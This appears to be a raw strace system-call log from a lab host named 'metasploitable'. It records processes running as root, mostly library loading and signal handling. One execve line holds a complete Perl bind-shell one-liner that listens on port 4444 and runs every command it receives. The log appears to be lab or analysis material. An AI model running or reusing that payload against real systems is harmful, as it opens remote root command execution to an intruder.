7472  07:18:55.859916 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7472  07:18:55.859945 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f95000

7472  07:18:55.859956 close(1)          = 0

7472  07:18:55.859966 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7472  07:18:55.859980 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

7472  07:18:55.859994 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

7472  07:18:55.860082 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

7472  07:18:55.860099 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7de5000

7472  07:18:55.860110 mmap2(0xb7ded000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7ded000

7472  07:18:55.860126 close(1)          = 0

7472  07:18:55.860138 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7472  07:18:55.860151 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

7472  07:18:55.860165 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

7472  07:18:55.860255 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

7472  07:18:55.860272 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dda000

7472  07:18:55.860283 mmap2(0xb7de3000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7de3000

7472  07:18:55.860299 close(1)          = 0

7472  07:18:55.860319 munmap(0xb7f95000, 29913) = 0

7472  07:18:55.860346 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

7472  07:18:55.860385 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

7472  07:18:55.860397 _llseek(1, 0, [0], SEEK_CUR) = 0

7472  07:18:55.860423 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

7472  07:18:55.860439 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f9c000

7472  07:18:55.860450 _llseek(1, 1624, [1624], SEEK_SET) = 0

7472  07:18:55.860464 munmap(0xb7f9c000, 1624) = 0

7472  07:18:55.860474 close(1)          = 0

7472  07:18:55.860503 getpgrp()         = 3831

7472  07:18:55.860512 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

7472  07:18:55.860527 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

7472  07:18:55.860543 brk(0x8101000)    = 0x8101000

7472  07:18:55.860573 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7472  07:18:55.860588 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7472  07:18:55.860602 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7472  07:18:55.860638 brk(0x8102000)    = 0x8102000

7472  07:18:55.860664 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7472  07:18:55.860682 stat64("/sbin/AB", 0xbf9db028) = -1 ENOENT (No such file or directory)

7472  07:18:55.860694 stat64("/bin/AB", 0xbf9db028) = -1 ENOENT (No such file or directory)

7472  07:18:55.860705 stat64("/usr/sbin/AB", 0xbf9db028) = -1 ENOENT (No such file or directory)

7472  07:18:55.860717 stat64("/usr/bin/AB", 0xbf9db028) = -1 ENOENT (No such file or directory)

7472  07:18:55.860729 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

7472  07:18:55.860744 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e106f8) = 7473

7473  07:18:55.860788 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7473  07:18:55.860804 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

7473  07:18:55.860817 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

7473  07:18:55.860841 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

7473  07:18:55.860898 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7473  07:18:55.860929 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7473  07:18:55.860958 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

7473  07:18:55.861012 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

7473  07:18:55.861026 --- SIGPIPE (Broken pipe) @ 0 (0) ---

7473  07:18:55.861107 exit_group(127)   = ?

7472  07:18:55.917558 rt_sigprocmask(SIG_SETMASK, [],  <unfinished ...>

4519  07:18:55.917604 waitpid(7472,  <unfinished ...>

7472  07:18:55.917657 <... rt_sigprocmask resumed> NULL, 8) = 0

7472  07:18:55.917672 --- SIGCHLD (Child exited) @ 0 (0) ---

7472  07:18:55.917693 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 7473

7472  07:18:55.917713 waitpid(-1, 0xbf9daca8, WNOHANG) = -1 ECHILD (No child processes)

7472  07:18:55.917725 sigreturn()       = ? (mask now [])

7472  07:18:55.917749 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

7472  07:18:55.917764 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7472  07:18:55.917775 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

7472  07:18:55.917787 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

7472  07:18:55.917813 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7472  07:18:55.917825 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

7472  07:18:55.917862 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7472  07:18:55.917883 stat64("/sbin/perl", 0xbf9db058) = -1 ENOENT (No such file or directory)

7472  07:18:55.917895 stat64("/bin/perl", 0xbf9db058) = -1 ENOENT (No such file or directory)

7472  07:18:55.917907 stat64("/usr/sbin/perl", 0xbf9db058) = -1 ENOENT (No such file or directory)

7472  07:18:55.917919 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

7472  07:18:55.917937 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

7472  07:18:55.917963 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

7472  07:18:55.917977 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e106f8) = 7474

7474  07:18:55.918045 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7474  07:18:55.918063 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

7474  07:18:55.918076 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

7474  07:18:55.918089 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

7474  07:18:55.918104 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7474  07:18:55.918120 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7474  07:18:55.918133 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

7474  07:18:55.918168 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

7474  07:18:55.918263 brk(0)            = 0x8153000

7474  07:18:55.918284 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7474  07:18:55.918301 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f50000

7474  07:18:55.918317 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

7474  07:18:55.918334 open("/etc/ld.so.cache", O_RDONLY) = 1

7474  07:18:55.918347 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7474  07:18:55.918365 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f48000

7474  07:18:55.918375 close(1)          = 0

7474  07:18:55.918386 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7474  07:18:55.918402 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

7474  07:18:55.918416 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

7474  07:18:55.918509 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

7474  07:18:55.918523 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f44000

7474  07:18:55.918523 mmap2(0xb7f46000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f46000

7474  07:18:55.918523 close(1)          = 0

7474  07:18:55.918524 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7474  07:18:55.918524 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

7474  07:18:55.918524 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

7474  07:18:55.918591 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

7474  07:18:55.918608 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f1f000

7474  07:18:55.918620 mmap2(0xb7f42000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f42000

7474  07:18:55.918636 close(1)          = 0

7474  07:18:55.918649 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7474  07:18:55.918663 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

7474  07:18:55.918677 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

7474  07:18:55.918764 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

7474  07:18:55.918781 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f1e000

7474  07:18:55.918794 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f06000

7474  07:18:55.918805 mmap2(0xb7f1a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f1a000

7474  07:18:55.918820 mmap2(0xb7f1c000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f1c000

7474  07:18:55.918834 close(1)          = 0

7474  07:18:55.918860 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7474  07:18:55.918874 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

7474  07:18:55.918888 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

7474  07:18:55.918981 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

7474  07:18:55.918999 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7db7000

7474  07:18:55.919010 mmap2(0xb7f00000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f00000

7474  07:18:55.919025 mmap2(0xb7f03000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f03000

7474  07:18:55.919039 close(1)          = 0

7474  07:18:55.919052 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7474  07:18:55.919065 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

7474  07:18:55.919079 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

7474  07:18:55.919169 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

7474  07:18:55.919186 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d85000

7474  07:18:55.919197 mmap2(0xb7d8e000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d8e000

7474  07:18:55.919212 mmap2(0xb7d90000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d90000

7474  07:18:55.919226 close(1)          = 0

7474  07:18:55.919249 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d84000

7474  07:18:55.919263 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d848c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

7474  07:18:55.919323 mprotect(0xb7f00000, 4096, PROT_READ) = 0

7474  07:18:55.919389 munmap(0xb7f48000, 29913) = 0

7474  07:18:55.919404 set_tid_address(0xb7d84908) = 7474

7474  07:18:55.919430 set_robust_list(0xb7d84910, 0xc) = 0

7474  07:18:55.919440 futex(0xbfda0240, 0x81 /* FUTEX_??? */, 1) = 0

7474  07:18:55.919454 rt_sigaction(SIGRTMIN, {0xb7f0a2c0, [], SA_SIGINFO}, NULL, 8) = 0

7474  07:18:55.919468 rt_sigaction(SIGRT_1, {0xb7f0a340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

7474  07:18:55.919480 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

7474  07:18:55.919494 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

7474  07:18:55.919517 uname({sys="Linux", node="metasploitable", ...}) = 0

7474  07:18:55.919564 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

7474  07:18:55.919610 brk(0)            = 0x8153000

7474  07:18:55.919620 brk(0x8174000)    = 0x8174000

7474  07:18:55.919663 getuid32()        = 0

7474  07:18:55.919674 geteuid32()       = 0

7474  07:18:55.919683 getgid32()        = 0

7474  07:18:55.919692 getegid32()       = 0

7474  07:18:55.919730 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d63000

7474  07:18:55.919756 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

7474  07:18:55.919774 read(1, "\255\222z\3", 4) = 4

7474  07:18:55.919791 close(1)          = 0

7474  07:18:55.919809 time(NULL)        = 1495624735

7474  07:18:55.919893 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfd9ff10) = -1 ENOENT (No such file or directory)

7474  07:18:55.919928 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfd9ff10) = -1 ENOENT (No such file or directory)

7474  07:18:55.919941 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfd9ff10) = -1 ENOENT (No such file or directory)

7474  07:18:55.919958 stat64("/usr/local/lib/perl/5.8.7", 0xbfda0050) = -1 ENOENT (No such file or directory)

7474  07:18:55.919971 stat64("/usr/local/share/perl/5.8.7", 0xbfda0050) = -1 ENOENT (No such file or directory)

7474  07:18:55.919984 stat64("/usr/local/lib/perl/5.8.6", 0xbfda0050) = -1 ENOENT (No such file or directory)

7474  07:18:55.919996 stat64("/usr/local/share/perl/5.8.6", 0xbfda0050) = -1 ENOENT (No such file or directory)

7474  07:18:55.920008 stat64("/usr/local/lib/perl/5.8.4", 0xbfda0050) = -1 ENOENT (No such file or directory)

